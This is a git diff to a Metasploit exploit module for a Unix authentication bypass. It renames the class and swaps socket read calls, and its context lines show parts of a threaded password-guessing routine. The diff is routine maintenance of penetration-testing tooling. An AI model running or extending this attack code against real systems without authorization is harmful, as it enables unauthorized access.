diff --git a/modules/exploits/unix/misc/psh_auth_bypass.rb b/modules/exploits/unix/misc/psh_auth_bypass.rb index a2f75173c6..29176f0443 100644 --- a/modules/exploits/unix/misc/psh_auth_bypass.rb +++ b/modules/exploits/unix/misc/psh_auth_bypass.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote connect sock.put(Rex::Text.rand_text_alpha(rand(5) + 1) + "\n") ::IO.select(nil, nil, nil, 1) - res = sock.get + res = sock.get_once disconnect if !res && !res.empty? @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Exploit::Remote t = Thread.new(item) do |count| sock = connect sock.put(password + "\n") - res = sock.get + res = sock.get_once until res.empty? break unless results.empty? @@ -135,7 +135,7 @@ class Metasploit3 < Msf::Exploit::Remote elsif res =~ /Error/ break end - res = sock.get + res = sock.get_once end end